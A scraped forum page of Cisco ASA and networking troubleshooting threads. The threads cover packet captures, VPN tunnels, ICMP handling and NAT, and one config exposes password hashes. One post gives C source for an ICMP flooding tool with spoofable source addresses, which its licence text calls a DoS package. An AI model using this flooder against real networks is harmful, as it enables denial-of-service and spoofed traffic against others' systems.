ASA ICMP Packets
Hi Guys,
Actually we have two ASA 5520 in active/passive. We are losing random icmp packets between hosts located at different ASA’s interfaces or zones so; random icmp packets are losed when cross the firewalls.
asa# sh interface | i errors
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 2 interface resets
94 input errors, 0 CRC, 0 frame, 94 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 2 interface resets
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 2 interface resets
0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 2 interface resets
2 input errors, 0 CRC, 0 frame, 2 overrun, 0 ignored, 0 abort
0 output errors, 0 collisions, 0 interface resets
asa# show conn count
7924 in use, 7934 most used
asa# show resource usage
Resource Current Peak Limit Denied Context
SSH 2 2 5 0 System
ASDM 1 3 5 0 System
Syslogs [rate] 444 1295 N/A 0 System
Conns 7284 8000 280000 0 System
Xlates 2728 3063 N/A 0 System
Hosts 3155 3403 N/A 0 System
Conns [rate] 195 946 N/A 0 System
Inspects [rate] 20 280 N/A 0 System
asa# sh processes cpu-usage non-zero
PC Thread 5Sec 1Min 5Min Process
081a86c4 c91afa08 56.9% 45.1% 37.5% Dispatch Unit
08c15df6 c91a93a8 1.3% 1.3% 1.2% Logger
08190627 c91a4ec0 0.0% 0.1% 0.0% tmatch compile thread
084b6fa1 c91a40f8 0.3% 0.6% 0.6% IKE Daemon
083ccbfc c91a17a0 0.1% 0.1% 0.1% fover_health_monitoring_thread
08405637 c91a13b0 0.0% 0.1% 0.1% ha_trans_data_tx
085345ae c91a09d8 0.5% 0.3% 0.3% ARP Thread
088c038d c918f248 2.3% 2.2% 2.3% Unicorn Admin Handler
08bde96c c9189ba8 0.2% 0.4% 0.2% ssh
Actually I followed your recommendation about capture icmp traffic on ingress and egress interfaces to see how many packets are getting to the ASA and how many are leaving... Dammit!, I saw the same input and output traffic. I can’t see on the ASP capture any icmp packet being dropped by the ASA…
Thxs a lot guys for your help, I really appreciated that.
asa(config)# sh capture
capture capin type raw-data interface franqui [Capturing - 204480 bytes]
match icmp host 192.168.3.130 host 172.31.5.28
capture capout type raw-data interface inside [Capturing - 204480 bytes]
match icmp host 192.168.3.130 host 172.31.5.28
capture asp type asp-drop all buffer 9999999 [Capturing - 9880419 bytes]
asa(config)#
asa(config)# sho cap asp | i 192.168.3.130
1094: 11:15:02.770056 192.168.3.130.80 > 10.150.4.139.52083: . ack 1800180435 win 64240
8427: 11:16:39.131340 192.168.3.130.137 > 192.168.3.255.137: udp 50
8534: 11:16:39.877548 192.168.3.130.137 > 192.168.3.255.137: udp 50
8606: 11:16:40.624982 192.168.3.130.137 > 192.168.3.255.137: udp 50
13257: 11:17:46.657253 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
15450: 11:18:18.148170 192.168.3.130.137 > 192.168.3.255.137: udp 50
23235: 11:20:01.004226 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
24334: 11:20:15.551271 192.168.3.130.138 > 192.168.3.255.138: udp 201
28941: 11:21:21.650265 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
30622: 11:21:47.743842 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
38870: 11:23:44.843721 192.168.3.130.137 > 192.168.3.255.137: udp 50
51315: 11:26:39.053433 192.168.3.130.137 > 192.168.3.255.137: udp 50
51382: 11:26:39.790349 192.168.3.130.137 > 192.168.3.255.137: udp 50
51438: 11:26:40.540285 192.168.3.130.137 > 192.168.3.255.137: udp 50
66736: 11:30:18.165610 192.168.3.130.137 > 192.168.3.255.137: udp 50
75694: 11:32:17.742301 192.168.3.130.138 > 192.168.3.255.138: udp 201
asa(config)# sho cap asp | i 172.31.5.28
458: 11:14:54.353894 172.31.5.28.138 > 172.31.255.255.138: udp 201
9219: 11:16:49.088404 172.31.5.28.63954 > 172.31.5.254.443: F 1216116677:1216116677(0) ack 3105814648 win 65535
9220: 11:16:49.129647 172.31.5.28.63955 > 172.31.5.254.443: F 3311562654:3311562654(0) ack 1788680111 win 65535
9907: 11:16:58.316817 172.31.5.28.63957 > 172.31.5.254.443: F 2372132966:2372132966(0) ack 3446739520 win 65535
9924: 11:16:58.465155 172.31.5.28.63958 > 172.31.5.254.443: F 3052199358:3052199358(0) ack 4060397993 win 65535
9926: 11:16:58.478353 172.31.5.28.63959 > 172.31.5.254.443: F 2416626469:2416626469(0) ack 600987510 win 65535
10207: 11:17:01.425911 172.31.5.28.63960 > 172.31.5.254.443: F 4284764250:4284764250(0) ack 2764360472 win 65535
10209: 11:17:01.462653 172.31.5.28.63962 > 172.31.5.254.443: F 2897853406:2897853406(0) ack 36732653 win 65535
10562: 11:17:06.392862 172.31.5.28.63963 > 172.31.5.254.443: F 3418331111:3418331111(0) ack 4106159305 win 65535
10566: 11:17:06.437782 172.31.5.28.63965 > 172.31.5.254.443: F 351951743:351951743(0) ack 3852846382 win 65535
10570: 11:17:06.491109 172.31.5.28.63964 > 172.31.5.254.443: R 3743180378:3743180378(0) ack 2036124283 win 0
10571: 11:17:06.491322 172.31.5.28.63964 > 172.31.5.254.443: R 3743180378:3743180378(0) win 0
10605: 11:17:06.990885 172.31.5.28.63967 > 172.31.5.254.443: R 1622463220:1622463220(0) ack 1444481707 win 0
10606: 11:17:06.991113 172.31.5.28.63966 > 172.31.5.254.443: F 4291895411:4291895411(0) ack 1869758408 win 65535
10607: 11:17:06.991205 172.31.5.28.63967 > 172.31.5.254.443: R 1622463220:1622463220(0) win 0
10716: 11:17:09.033506 172.31.5.28.63968 > 172.31.5.254.443: F 1213337051:1213337051(0) ack 2793080200 win 65535
28699: 11:21:18.048444 172.31.5.28.63978 > 172.31.5.254.443: F 3516588597:3516588597(0) ack 4082523455 win 65535
28702: 11:21:18.082530 172.31.5.28.63979 > 172.31.5.254.443: F 2624860618:2624860618(0) ack 1229240024 win 65535
29157: 11:21:25.289917 172.31.5.28.63980 > 172.31.5.254.443: F 1840304766:1840304766(0) ack 3822990521 win 65535
29159: 11:21:25.369808 172.31.5.28.63983 > 172.31.5.254.443: F 879930713:879930713(0) ack 1786169064 win 65535
29160: 11:21:25.381587 172.31.5.28.63984 > 172.31.5.254.443: F 427260469:427260469(0) ack 341330867 win 65535
29321: 11:21:28.067242 172.31.5.28.63985 > 172.31.5.254.443: F 2238218183:2238218183(0) ack 2288210469 win 65535
29325: 11:21:28.098902 172.31.5.28.63986 > 172.31.5.254.443: F 118474273:118474273(0) ack 4277263123 win 65535
29665: 11:21:33.143074 172.31.5.28.63987 > 172.31.5.254.443: F 1353084768:1353084768(0) ack 2091147977 win 65535
29667: 11:21:33.174566 172.31.5.28.63989 > 172.31.5.254.443: F 3477322977:3477322977(0) ack 2198309559 win 65535
29701: 11:21:33.621763 172.31.5.28.63988 > 172.31.5.254.443: R 1603447742:1603447742(0) ack 2966254164 win 0
29702: 11:21:33.622007 172.31.5.28.63991 > 172.31.5.254.443: R 272764148:272764148(0) ack 2362014837 win 0
29703: 11:21:33.622282 172.31.5.28.63988 > 172.31.5.254.443: R 1603447742:1603447742(0) win 0
29704: 11:21:33.622328 172.31.5.28.63991 > 172.31.5.254.443: R 272764148:272764148(0) win 0
29767: 11:21:34.860764 172.31.5.28.63992 > 172.31.5.254.443: F 4226212155:4226212155(0) ack 2230361367 win 65535
52256: 11:26:52.323835 172.31.5.28.138 > 172.31.255.255.138: udp 201
asa(config)# sho cap asp | i 192.168.3.130
1094: 11:15:02.770056 192.168.3.130.80 > 10.150.4.139.52083: . ack 1800180435 win 64240
8427: 11:16:39.131340 192.168.3.130.137 > 192.168.3.255.137: udp 50
8534: 11:16:39.877548 192.168.3.130.137 > 192.168.3.255.137: udp 50
8606: 11:16:40.624982 192.168.3.130.137 > 192.168.3.255.137: udp 50
13257: 11:17:46.657253 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
15450: 11:18:18.148170 192.168.3.130.137 > 192.168.3.255.137: udp 50
23235: 11:20:01.004226 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
24334: 11:20:15.551271 192.168.3.130.138 > 192.168.3.255.138: udp 201
28941: 11:21:21.650265 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
30622: 11:21:47.743842 802.1Q vlan#1200 P0 10.104.104.36.137 > 192.168.3.130.137: udp 50
38870: 11:23:44.843721 192.168.3.130.137 > 192.168.3.255.137: udp 50
51315: 11:26:39.053433 192.168.3.130.137 > 192.168.3.255.137: udp 50
51382: 11:26:39.790349 192.168.3.130.137 > 192.168.3.255.137: udp 50
51438: 11:26:40.540285 192.168.3.130.137 > 192.168.3.255.137: udp 50
66736: 11:30:18.165610 192.168.3.130.137 > 192.168.3.255.137: udp 50
75694: 11:32:17.742301 192.168.3.130.138 > 192.168.3.255.138: udp 201
asa(config)# sho cap asp | i 172.31.5.28
458: 11:14:54.353894 172.31.5.28.138 > 172.31.255.255.138: udp 201
9219: 11:16:49.088404 172.31.5.28.63954 > 172.31.5.254.443: F 1216116677:1216116677(0) ack 3105814648 win 65535
9220: 11:16:49.129647 172.31.5.28.63955 > 172.31.5.254.443: F 3311562654:3311562654(0) ack 1788680111 win 65535
9907: 11:16:58.316817 172.31.5.28.63957 > 172.31.5.254.443: F 2372132966:2372132966(0) ack 3446739520 win 65535
9924: 11:16:58.465155 172.31.5.28.63958 > 172.31.5.254.443: F 3052199358:3052199358(0) ack 4060397993 win 65535
9926: 11:16:58.478353 172.31.5.28.63959 > 172.31.5.254.443: F 2416626469:2416626469(0) ack 600987510 win 65535
10207: 11:17:01.425911 172.31.5.28.63960 > 172.31.5.254.443: F 4284764250:4284764250(0) ack 2764360472 win 65535
10209: 11:17:01.462653 172.31.5.28.63962 > 172.31.5.254.443: F 2897853406:2897853406(0) ack 36732653 win 65535
10562: 11:17:06.392862 172.31.5.28.63963 > 172.31.5.254.443: F 3418331111:3418331111(0) ack 4106159305 win 65535
10566: 11:17:06.437782 172.31.5.28.63965 > 172.31.5.254.443: F 351951743:351951743(0) ack 3852846382 win 65535
10570: 11:17:06.491109 172.31.5.28.63964 > 172.31.5.254.443: R 3743180378:3743180378(0) ack 2036124283 win 0
10571: 11:17:06.491322 172.31.5.28.63964 > 172.31.5.254.443: R 3743180378:3743180378(0) win 0
10605: 11:17:06.990885 172.31.5.28.63967 > 172.31.5.254.443: R 1622463220:1622463220(0) ack 1444481707 win 0
10606: 11:17:06.991113 172.31.5.28.63966 > 172.31.5.254.443: F 4291895411:4291895411(0) ack 1869758408 win 65535
10607: 11:17:06.991205 172.31.5.28.63967 > 172.31.5.254.443: R 1622463220:1622463220(0) win 0
10716: 11:17:09.033506 172.31.5.28.63968 > 172.31.5.254.443: F 1213337051:1213337051(0) ack 2793080200 win 65535
28699: 11:21:18.048444 172.31.5.28.63978 > 172.31.5.254.443: F 3516588597:3516588597(0) ack 4082523455 win 65535
28702: 11:21:18.082530 172.31.5.28.63979 > 172.31.5.254.443: F 2624860618:2624860618(0) ack 1229240024 win 65535
29157: 11:21:25.289917 172.31.5.28.63980 > 172.31.5.254.443: F 1840304766:1840304766(0) ack 3822990521 win 65535
29159: 11:21:25.369808 172.31.5.28.63983 > 172.31.5.254.443: F 879930713:879930713(0) ack 1786169064 win 65535
29160: 11:21:25.381587 172.31.5.28.63984 > 172.31.5.254.443: F 427260469:427260469(0) ack 341330867 win 65535
29321: 11:21:28.067242 172.31.5.28.63985 > 172.31.5.254.443: F 2238218183:2238218183(0) ack 2288210469 win 65535
29325: 11:21:28.098902 172.31.5.28.63986 > 172.31.5.254.443: F 118474273:118474273(0) ack 4277263123 win 65535
29665: 11:21:33.143074 172.31.5.28.63987 > 172.31.5.254.443: F 1353084768:1353084768(0) ack 2091147977 win 65535
29667: 11:21:33.174566 172.31.5.28.63989 > 172.31.5.254.443: F 3477322977:3477322977(0) ack 2198309559 win 65535
29701: 11:21:33.621763 172.31.5.28.63988 > 172.31.5.254.443: R 1603447742:1603447742(0) ack 2966254164 win 0
29702: 11:21:33.622007 172.31.5.28.63991 > 172.31.5.254.443: R 272764148:272764148(0) ack 2362014837 win 0
29703: 11:21:33.622282 172.31.5.28.63988 > 172.31.5.254.443: R 1603447742:1603447742(0) win 0
29704: 11:21:33.622328 172.31.5.28.63991 > 172.31.5.254.443: R 272764148:272764148(0) win 0
29767: 11:21:34.860764 172.31.5.28.63992 > 172.31.5.254.443: F 4226212155:4226212155(0) ack 2230361367 win 65535
52256: 11:26:52.323835 172.31.5.28.138 > 172.31.255.255.138: udp 201
Similar Messages
-
While researching socket programming in C, I stumbled upon a piece of code designed to repetitively send icmp packets to a given target. The concept peaked my interest as a viable stress test for a home router, so i copied and compiled the code to see if and how it worked.... well, it DIDN'T work... The code didn't even compile, let alone run. Still interested and not wanting to let this go, I re-wrote the code. Made it better and made it work. I believe this is an interesting utility to say the least and I encourage anyone reading this to test it (ON YOUR OWN SYSTEMS/NETWORK) and/or give input on how to improve upon it. Depending on the feedback i get on here I might try to make a package build out of it.
Disclaimer!!: The following source code is intended specifically for educational purposes and systems testing only. I take no responsibility, and hold no liability for the misuse of this code.
My source code is listed below.
packetsoup.h
* Packetsoup.h
* Prototype Functions for icmp_pingV2 project
* Written By DeadDingo
* All Rights Reserved 12.21.2013
#ifndef PACK_SOUP_H_
#define PACK_SOUP_H_
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <arpa/inet.h>
typedef unsigned char u8;
typedef unsigned short int u16;
* Description:
* Calculates the checksum on a packet to packet basis
unsigned short in_cksum(unsigned short *ptr, int nbytes);
* Description:
* Displays Usage Dialog
void Usage( void );
#endif
packetsoup.c
* Packsoup.c
* Written by DeadDingo
* All Rights Reserved 12.21.2013
* Note:
* in_cksum() function written by Silver Moon
#include "packetsoup.h"
unsigned short in_cksum(unsigned short *ptr, int nbytes) {
register long sum;
u_short oddbyte;
register u_short answer;
sum = 0;
while(nbytes > 1) {
sum += *ptr++;
nbytes -= 2;
if(nbytes == 1) {
oddbyte = 0;
*((u_char *) & oddbyte ) = *(u_char *) ptr;
sum += oddbyte;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return answer;
void Usage( void ) {
puts("Usage: ");
puts(" -s <source address>");
puts(" -d <destination address>");
puts(" -p <payload size>");
printf("a.out -s <source address> -d <destination address> -p <payload size>\n");
exit(8);
main.c
* icmp_pingV2 project
* ICMP packet utility
* Orriginally Written By Silver Moon
* Version 2 Written By DeadDingo
* Copyright 12.21.2013
* This file is part of the icmp_ping package
* The icmp_pingV2 package is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public Licence as published by
* the Free Software Foundation, either version 3 of the Licence, or
* (at your option) any later version.
* The icmp_pingV2 package is distrubuted in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABLILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public Licence for more details.
* You should have received a copy of the GNU General Public Licence
* along with the DoS package. If not, see <http://www.gnu.org/licences/>.
* ================================================
* Version 2 Channel Log:
* - Better Argument Parsing
* - Better Error Checking
* - Fixed Bad Structure Types (Now runs on BSD, Linux, and OSX)
* - Fixed Bad Member Variables
* - Added Usage Dialog
#include "packetsoup.h"
int main ( int argc, char *argv[ ] ) {
unsigned long daddr;
unsigned long saddr;
int payload_size = 0, sent, sent_size, on, i;
* Argument Parsing...*/
if(argc < 3) {
Usage();
for( i = 1; i < argc; i ++ ) {
if(strncmp(argv[i], "-s", 2) == 0) {
saddr = inet_addr(argv[i+1]);
if(strncmp(argv[i], "-d", 2) == 0) {
daddr = inet_addr(argv[i+1]);
if(strncmp(argv[i], "-p", 2) == 0) {
payload_size = atoi(argv[i+1]);
} //end for loop
//end arg parsing
//Get Raw Socket
int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(sockfd < 0) {
perror("Could not create socket:");
return 0;
puts("Socket Is Live!");
//provide packet headers
if( setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, (const char *)&on, sizeof(on)) == -1 ) {
perror("setsockopt:");
return 0;
//allow socket to send datagrams to broadcast addresses
if( setsockopt(sockfd, SOL_SOCKET, SO_BROADCAST, (const char *)&on, sizeof(on)) == -1 ) {
perror("setsockopt");
return 0;
//calc packet size
int packet_size = sizeof(struct ip) + sizeof(struct icmp) + payload_size;
char *packet = (char *)malloc(packet_size);
if(!packet) {
perror("Memory Error");
close(sockfd);
return 0;
//ip header
struct ip *iphdr = (struct ip *)packet;
struct icmp *icmphdr = (struct icmp *) (packet + sizeof(struct ip));
//zero the packet buffer
memset(packet, 0, packet_size);
//set member variables and whatnot
iphdr->ip_v = 4;
iphdr->ip_hl = 5;
iphdr->ip_tos = 0;
iphdr->ip_len = htons(packet_size);
iphdr->ip_id = rand();
iphdr->ip_off = 0;
iphdr->ip_ttl = 255;
iphdr->ip_p = IPPROTO_ICMP;
iphdr->ip_src.s_addr = saddr;
iphdr->ip_dst.s_addr = daddr;
icmphdr->icmp_type = ICMP_ECHO;
icmphdr->icmp_code = 0;
icmphdr->icmp_seq = rand();
icmphdr->icmp_id = rand();
icmphdr->icmp_cksum = 0;
struct sockaddr_in servaddr;
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = daddr;
memset(&servaddr.sin_zero, 0, sizeof(servaddr.sin_zero));
puts("sending to target...");
while(1) {
memset(packet + sizeof(struct ip) + sizeof(struct icmp), rand() % 255, payload_size);
//calculate icmp header checksum
icmphdr->icmp_cksum = 0;
icmphdr->icmp_cksum = in_cksum( (unsigned short *)icmphdr, sizeof(struct icmp) + payload_size );
if( ( sent_size = sendto( sockfd, packet, packet_size, 0, (struct sockaddr *) &servaddr, sizeof(servaddr) ) ) < 1 ) {
perror("Packet Send Failed");
break;
++sent;
printf("%d packets sent\r", sent);
fflush(stdout);
usleep(10000);
free(packet);
close(sockfd);
return 0;
Last edited by DeadDingo (2013-12-27 04:07:24)Ok sounds good, like I said, it is meant to be a learning tool as some of the demo code available online does not accurately portray the proper ip structures needed for socket communication. I actually had to read through a bunch of C libraries to find the correct structs and member variables.
-
Regarding ICMP "Packet Too Big" message in 6PE RFC 4798
Dear All,
The penultimate para in Section 3, Page 6 of 6PE RFC 4798 states the following:
"Otherwise, routers in the IPv4 MPLS network have the option to generate an ICMP "Packet Too Big" message using mechanisms as described in Section 2.3.2 .... of [RFC3032]"
As per RFC3032, the routers in the IPv4 MPLS network can generate ICMP "Time Exceeded" message or "Destination Unreachable because fragmentation needed and DF set" message.
Can someone please explain, how a IPv4 MPLS router will generate an ICMP "Packet Too Big"? This requires that the router in IPv4 MPLS network be a dual stack router to understand the IPv6 header under the label stack. Is my understanding correct?
If the router is an intermediate LSR, how will it know the path to the IPv6 destination even if it is dual stack router?
Thanks in advance.
Cheers,
SriramSriram,
The IPv4 core router does need to have code to understand IPv6 and create the "Packet too big" message and so on. It does not need to be configured for IPv6 though (dual stack).
The forwarding will be done based on the incoming label stack for that IPv6 packet, which means that the ICMPv6 message will be constructed with the source of the original packet as the destination IPv6 address, the top label for the incoming IPv6 packet will be swapped, prepended to the ICMPv6 message and forwarded through the egress interface. The egress PE will received this ICMPv6 message and forwarding appropriately.
The same mechanism is used when performing traceroutes in an L3VPN context, as the core routers have no knowledge of the address space being used by the L3VPN customers and couldn't otherwise forward ICMP messages to the proper source.
Regards -
ASA - ICMP works on a L2L tunnel but TCP fails.
All,
I have just started to work with the ASA's and I have a couple of problems with two 5510 8.4(1) ASA's supporting a L2L tunnel.
Problem-1:
Below is the topology and currently the only config on these ASA's is what is required to get the LAN2LAN tunnel setup and nothing more. ASA01 and ASA02 are the tunnel termination devices.
LAN A->Routing device->ASA-01 ----->Internet<------------ASA-02<-Routing device<-LAN2
Below is what is working
- Tunnel is established between the ASA's.
- I can ping from LAN A to LAN B and viceversa.
Below is not what is working
- I cannot RDP from a device in LAN A to LAN B and vice versa.
What we found in troubleshooting when we initiate a RDP session from a server in LAN-A to Server in LAN-B.
- The packet capture on ASA - A shows that the SYN leaves the ingress(LAN interface).
- The packet capture on ASA - B shows that the SYN is leaving the LAN interface.
- Dont see a SYN-ACK on ASA-B. First we thought there might be a different reason(detailed below as problem-2) but we dont see the syn-ack on ASA-A either.
- Doing a asp-drop capture on ASA-B we saw that the SYN,ACK from server in LAN-B is being dropped with the following message
Drop-reason: (tcp-not-syn) First TCP packet not SYN
Any ideas on why ASA-B doesnt treat this is as a established tcp session?
Problem -2
On the packet capture wizard in ASDM if I do a capture on the LAN interface of the ASA02 I can only see packets leaving the ASA towards the LAN but I do not see anything coming back into the interface from the LAN interface. This works the same whether I do a ICMP or a TCP session(RDP).
For example - Ping from a server on LAN A to LAN B
- On ASA01
The packet capture wizard shows both icmp-echo from LAN-A and icmp-reply from LAN-B
- On ASA02
The packet capture wizard shows icmp-echo from LAN-A both not the icmp-reply from LAN-B.
I am not sure what the reason for both the problems above and the reasons might just be that my skill level with ASA's are just not there yet. Any guidance will be great appreciated.
Thanks,
VishnuHello Vishnu,
Any ideas on why ASA-B doesnt treat this is as a established tcp session?
This is happening because the ASA is not seeing the entire 3 way hanshake, Are you sure all the packets are going across the ASA??? I would recommend you to do captures on both inside interfaces just for RDP traffic and attach them to this post so I can correlate to determine if indeed the ASA is receving what it needs.
On the packet capture wizard in ASDM if I do a capture on the LAN interface of the ASA02 I can only see packets leaving the ASA towards the LAN but I do not see anything coming back into the interface from the LAN interface. This works the same whether I do a ICMP or a TCP session(RDP).
That's exactly the reason of why this problem is happening, Good job correlating the facts,
Resolution of the issues:
I would say the problem is on the Routing device between ASA-2 and the LAN-2...
Make sure the Routing device knows that in order to reach the LAN-1 it needs to send the traffic back to the ASA-2 as somehow this traffic is not making it on the right interface,
Remember to rate all of the helpful posts. That's as important as a Thanks.
Julio Carvajal Segura -
ASA: capture packets travelling vom EasyVPN client to EasyVPN client
Hey everyone,
I have a central ASA running as a EasyVPN Server and several ISR 800 routers configured as clients.
When a connection is initiated from Client1 to Client2 over the ASA I cant see the decrypted packets in packet capture.
Is there any way to make them visible?
Thanks
MichaelI think this was actually related to the fact that the bad PIX had a restricted license and couldn't comply with the 3DES transform set.
I ended up bypassing by creating a site-to-site tunnel with a single DES transform set and it worked fine. I might go back later and see if I can set multiple transform sets to the dynamic map or if I can have multiple dynamic maps for legacy devices. -
ASA ESP Packet discard messages
Dear All,
we have a L2L tunnel between ASA 8.2.5 to Cisco Router. Recently we see tunnel is going down and shows messages in ASA about ESP packet discard. Below is the message.
%ASA-7-710006: ESP request discarded from x.x.x.x to outside_int:x.x.x
At the same time from router the tunnel shows up but ASA not. We see CSCso50226 which matches exactly with our issue.
As a workaround we were resetting tunnel from router. It comes up and runs for a week.
Please someone look into this and help.
Regards,
RaviHi Ravi,
8.4 is great, dont let the NAT change scare you off two much and 8.2 was really buggy.
I guess this raises further questions, if your tunnel goes down once a week is it the same length of time ? and does this relate to the timings set on either end in teh configuration ?
When the tunnel goes down is it at a quiet time ? and have you tried using a test ping/rtr/sla to keep the tunnel up ?
The site below identifies the syslog messages and yours makes me think somethings not right. Do you have the sysoptions enabled or are you using ACL's to limit who can connect to the appliance as a vpn peer ? If you have ACL's have you included IP 50 ?
http://www.cisco.com/en/US/docs/security/asa/asa82/system/message/logmsgs.html
710006
Error Message %ASA-7-710006: protocol request discarded from source_address to
interface_name:dest_address
Explanation This message appears when the adaptive security appliance does not have an IP server that services the IP protocol request; for example, the adaptive security appliance receives IP packets that are not TCP or UDP, and the adaptive security appliance cannot service the request.
Recommended Action In networks that use broadcasting services such as DHCP, RIP or NetBIOS extensively, the frequency of this message can be high. If this message appears in excessive numbers, it may indicate an attack.
Best Regards
Ju
http://helpamunky.wordpress.com/ -
Windows Firewall indound icmp packets drop
Hi, we have enabled icmpv4 traffic with a local firewall inbound rule in a gpo and we still having ping drops. Is there another value somewhere that we could disable in our setup. It seems like a protection coming from the windows
server 2008 and for no specific reason it blocks the traffic.
The ping comes from a load balancer linux base machine. We have created another test rule that is opening all ports and all protocol coming from that ip address and we get the same behaviour.
We know if we restart the server it will let the ping go through again with no problem but for a relatively short period of time.
Carl R.
ThanksHi Carl,
>>we have enabled icmpv4 traffic with a local firewall inbound rule in a gpo and we still having ping drops.
Before going further, we can cmd command gpresult/h gpreport.html with admin privileges to collect group policy result to check if the policy setting was applied successfully.
Regarding how to allow inbound Internet Control Message Protocol (ICMP) network traffic, the following article can be referred for more information.
Create an Inbound ICMP Rule on Windows 7, Windows Vista, Windows Server 2008, or Windows Server 2008 R2
http://technet.microsoft.com/en-us/library/cc972926(v=ws.10).aspx
Besides, for this is related to network, in order to get more and better help, we can also ask for suggestions in the following network forum.
Network Access Protection
https://social.technet.microsoft.com/Forums/windowsserver/en-US/home?forum=winserverNAP
Best regards,
Frank Shen -
ASA 5520 packets Flood TCP/ASA
I 'm flood from random adresse IP in TCP/61137
what can i do with the asa5520 my appliance security ?You must use the shun command
-
ASA 8.4(2) doesn't respond to ICMP echo on ip address with port forwarding only
Hello,
In order to meet our requirements we had to configure PAT for TCP 80 on 2 external IP addresses to one internal IP in DMZ. TCP port 80 is being translated for both external IP addresses and it works as expected. However, since we have migrated to ASA both external IP addresses don't respond to ICMP echo requests generating following error:
%ASA-3-106014: Deny inbound icmp src outside:<Source IP> dst outside:<Destination IP> (type 8, code 0)
Previously we have been using Cisco router to achieve the same objective and it worked well.
I have noticed that when I add "same-security-traffic permit intra-interface" to a configuration the message mentioned above stops appearing in a logs.
As far as I can tell ASA sends packet back through outside interface, despite the fact that appliance advertises its mac address in response to arp request for the same external IP address.
Is there any way to make ASA realise that it should respond to ICMP echo requests on external IP addresses that have forwarding setup?
I do realise that ICMP would work in 1-to-1 NAT scenario, but we can't apply 1-to-1 NAT for 2 external IP addresses to point to one internal IP address.
Kind Regards,
Paul PrestonHi Julio,
Interesting. I have tried to map two external IP addresses with using 1 to 1 nat to a single internal IP, but when I tried to configure a second one I remember a message "mapping exists"...
I think that it might be easier if I paste relevent config:
access-list From_Internet extended permit icmp any any
access-list From_Internet extended permit tcp any gt 1023 host 172.17.0.103 eq www
access-list From_Internet extended deny ip any any log warnings
object network www-91-17.103
host 172.17.0.103
object network www-92-17.103
host 172.17.0.103
icmp permit any outside
object network www-91-17.103
nat (DMZ,outside) static x.x.x.91 service tcp www www
object network www-92-17.103
nat (DMZ,outside) static x.x.x.92 service tcp www www
With a config above NAT works for both IP addresses, but unfortunately neither IP address respond to icmp echo requests.
Kind Regards,
Paul Preston -
Cisco ASA 5505 IPsec client VPN - Cannot connect to local hosts
I have created a Cisco IPsec vpn on my ASA using the VPN creation wizard. I am able to successfully connect to the vpn and seemingly join the network, but after I connect I am unable to connect to or ping any of the hosts on the network.
Checking the ASA I can see that a VPN session is open and my client reports that it is connected. If I attempt to ping the client from the ASA all packets are dropped.
I suspect it may be an issue with my firewall, but I am not really sure where to begin.
Here is a copy of my config, any pointers or tips are aprpeciated:
hostname mcfw
enable password Pt8fQ27yMZplioYq encrypted
passwd 2qaO2Gd6IBRkrRFm encrypted
names
interface Ethernet0/0
switchport access vlan 400
interface Ethernet0/1
switchport access vlan 400
interface Ethernet0/2
switchport access vlan 420
interface Ethernet0/3
switchport access vlan 420
interface Ethernet0/4
switchport access vlan 450
interface Ethernet0/5
switchport access vlan 450
interface Ethernet0/6
switchport access vlan 500
interface Ethernet0/7
switchport access vlan 500
interface Vlan400
nameif outside
security-level 0
ip address 58.13.254.10 255.255.255.248
interface Vlan420
nameif public
security-level 20
ip address 192.168.20.1 255.255.255.0
interface Vlan450
nameif dmz
security-level 50
ip address 192.168.10.1 255.255.255.0
interface Vlan500
nameif inside
security-level 100
ip address 192.168.0.1 255.255.255.0
ftp mode passive
clock timezone JST 9
same-security-traffic permit inter-interface
same-security-traffic permit intra-interface
object-group network DM_INLINE_NETWORK_1
network-object host 58.13.254.11
network-object host 58.13.254.13
object-group service ssh_2220 tcp
port-object eq 2220
object-group service ssh_2251 tcp
port-object eq 2251
object-group service ssh_2229 tcp
port-object eq 2229
object-group service ssh_2210 tcp
port-object eq 2210
object-group service DM_INLINE_TCP_1 tcp
group-object ssh_2210
group-object ssh_2220
object-group service zabbix tcp
port-object range 10050 10051
object-group service DM_INLINE_TCP_2 tcp
port-object eq www
group-object zabbix
port-object eq 9000
object-group protocol TCPUDP
protocol-object udp
protocol-object tcp
object-group service http_8029 tcp
port-object eq 8029
object-group network DM_INLINE_NETWORK_2
network-object host 192.168.20.10
network-object host 192.168.20.30
network-object host 192.168.20.60
object-group service imaps_993 tcp
description Secure IMAP
port-object eq 993
object-group service public_wifi_group
description Service allowed on the Public Wifi Group. Allows Web and Email.
service-object tcp-udp eq domain
service-object tcp-udp eq www
service-object tcp eq https
service-object tcp-udp eq 993
service-object tcp eq imap4
service-object tcp eq 587
service-object tcp eq pop3
service-object tcp eq smtp
access-list outside_access_in remark http traffic from outside
access-list outside_access_in extended permit tcp any object-group DM_INLINE_NETWORK_1 eq www
access-list outside_access_in remark ssh from outside to web1
access-list outside_access_in extended permit tcp any host 58.13.254.11 object-group ssh_2251
access-list outside_access_in remark ssh from outside to penguin
access-list outside_access_in extended permit tcp any host 58.13.254.10 object-group ssh_2229
access-list outside_access_in remark http from outside to penguin
access-list outside_access_in extended permit tcp any host 58.13.254.10 object-group http_8029
access-list outside_access_in remark ssh from outside to hub & studio
